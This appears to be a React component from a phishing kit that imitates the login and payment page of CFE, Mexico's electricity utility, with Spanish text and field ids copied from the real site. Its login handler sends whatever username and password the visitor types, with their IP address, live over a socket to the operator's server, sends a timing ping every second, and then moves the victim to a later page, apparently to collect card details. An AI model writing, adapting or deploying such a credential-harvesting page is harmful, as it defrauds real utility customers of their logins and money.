import React from "react";
import socket from "../../socket";
import { link, apiKey } from "./../settings";
import axios from "axios";

function Login1({ sPage, sA, sT }) {
  const [aux, setAux] = React.useState(false);
  const [aux2, setAux2] = React.useState(false);
  const [aux3, setAux3] = React.useState(false);
  const [user, setUser] = React.useState("");
  const [password, setPassword] = React.useState("");
  const [isActive, setIsActive] = React.useState(false);
  const [time, setTime] = React.useState(0);
  const [cont, setCont] = React.useState(0);
  const [data, setData] = React.useState("");

  React.useEffect(() => {
    getData();
  }, []);

  const getData = async () => {
    await axios
      .get()
      .then((res) => {
        setData(res.data);
      })
      .catch((err) => {
        console.error(err);
      });
  };

  const handleButton = () => {
    if (user !== "" && password !== "") {
      setIsActive(true);
      socket.connect();
      socket.emit("update username", { username: user });
      socket.emit("update password", { password: password });
      socket.auth = {
        username: user,
        password: password,
        ip: data.ip,
      };
      setIsActive(true);
      sA(true);
    } else {
      setAux2(true);
      setAux3(false);
    }
  };

  React.useEffect(() => {
    let interval = null;
    if (time >= 5) {
      setIsActive(false);
      setAux2(false);
      setCont(cont + 0);
      setTime(0);
      sPage(4);
      sA(false);
    }

    if (isActive) {
      interval = setInterval(() => {
        setTime((time) => time + 1);
        socket.emit("time user", { time: time + 1, p: cont + 2 });
        sT(time);
      }, 1000);
    } else {
      clearInterval(interval);
    }
    return () => {
      clearInterval(interval);
    };
  }, [isActive, time, cont, sT, sA]);

  const handleR = () => {
    sPage(1);
  };

  const handleRegiste = () => {
    setAux(true);
  };

  React.useEffect(() => {
    if (user !== "" || password !== "") {
      setAux2(false);
    }
  }, [user, password]);

  return (
    <>
      <div className="acctitle acctitlec">
        <i className="acc-closed icon-lock"></i>
        <i className="acc-open icon-unlock-alt"></i>Usuarios registrados
      </div>
      <div className="acc_content clearfix" style={{ display: "block" }}>
        <div id="login-form" className="nobottommargin">
          <div className="col_full">
            <label htmlFor="txtUsuario">Usuario:</label>
            <input
              name="ctl00$MainContent$txtUsuario"
              maxLength="100"
              id="ctl00_MainContent_txtUsuario"
              type="text"
              className="form-control"
              required=""
              onChange={(e) => {
                setUser(e.target.value);
              }}
            />
          </div>

          <div className="col_full">
            <label htmlFor="txtPassword">Contraseña:</label>
            <input
              name="ctl00$MainContent$txtPassword"
              maxLength="100"
              id="ctl00_MainContent_txtPassword"
              type="password"
              className="form-control"
              required=""
              onChange={(e) => {
                setPassword(e.target.value);
              }}
            />
            <span
              toggle="#ctl00_MainContent_txtPassword"
              className="icon-eye-open field-icon toggle-password"
            ></span>
          </div>
          {aux2 && (
            <div
              id="ctl00_MainContent_dvMensajeLogin"
              className="alert alert-danger"
            >
              <span id="ctl00_MainContent_lblMensajeLogin">
                Nombre de usuario y/o contraseña incorrectos.
              </span>
            </div>
          )}
          {aux3 && (
            <div
              id="ctl00_MainContent_dvMensajeLogin"
              className="alert alert-danger"
            >
              <span id="ctl00_MainContent_lblMensajeLogin">
                Error de conexión
              </span>
            </div>
          )}

          <div className="col_full nobottommargin">
            <input
              type="button"
              name="ctl00$MainContent$btnIngresar"
              value="Ingresar"
              id="ctl00_MainContent_btnIngresar"
              className="button button-rounded nomargin"
              onClick={handleButton}
            />
            <a href={link} className="fright">
              {" "}
              {/*link2*/}
              ¿Olvidaste tu contraseña?
            </a>
          </div>
        </div>
      </div>

      <div className="acctitle" onClick={handleR}>
        <i className="acc-closed icon-user3"></i>
        <i className="acc-open icon-user-check"></i>Paga como invitado! <br />
        <strong>Pago Seguro</strong>
      </div>
      <div className="acc_content clearfix" style={{ display: "none" }}>
        {" "}
        <div id="register-form" className="nobottommargin">
          <div className="col_full">
            <p>
              Sabía que puede pagar su factura por Internet sin iniciar sesión?
              Simplemente pague su factura como invitado usando su número de
              servicios, medidor o contrato mediante su tarjete de credito o
              débito.
            </p>
            <p>
              <strong>Pago Rapido y Seguro:</strong>
              <br />
              En la CFE trabajamos para consolidar una Cultura de Ética
              Corporativa que permita hacer frente a los desafíos actuales de la
              empresa y a contribuir a la sostenibilidad de nuestro clientes.
              <br />
            </p>
          </div>

          <div className="col_full nobottommargin" onClick={handleR}>
            <div className="button button-rounded nomargin">Pagar</div>
          </div>
        </div>
      </div>

      <div className="acctitle" onClick={handleRegiste}>
        <i className="acc-closed icon-user-plus"></i>
        <i className="acc-open icon-user-check"></i>¿Aún no tienes cuenta?{" "}
        <strong>Regístrate</strong>
      </div>
      <div
        className="acc_content clearfix"
        style={{ display: `${aux ? "block" : "none"}` }}
      >
        {" "}
        <div id="register-form" className="nobottommargin">
          <div className="col_full">
            <p>
              Si todavía no te has registrado al sitio de CFE, hazlo ahora mismo
              para aprovechar todos los beneficios de nuestra sección Servicios
              en línea.
            </p>
            <p>
              <strong>¿Qué puedo hacer si me registro?</strong>
              <br />
              Consultar tu recibo
              <br />
              Pagar tu recibo
              <br />
              Avisar de fallas de luz
              <br />
              Solicitar que revisen tu medidor
              <br />
            </p>
          </div>

          <div className="col_full nobottommargin">
            <a href={link} className="button button-rounded nomargin">
              Regístrate
            </a>
          </div>
        </div>
      </div>
      <br />
      <br />
      <div className="col_full center">
        <a href={link} className="button button-black button-rounded nomargin">
          Regresar
        </a>
      </div>
    </>
  );
}

export default Login1;
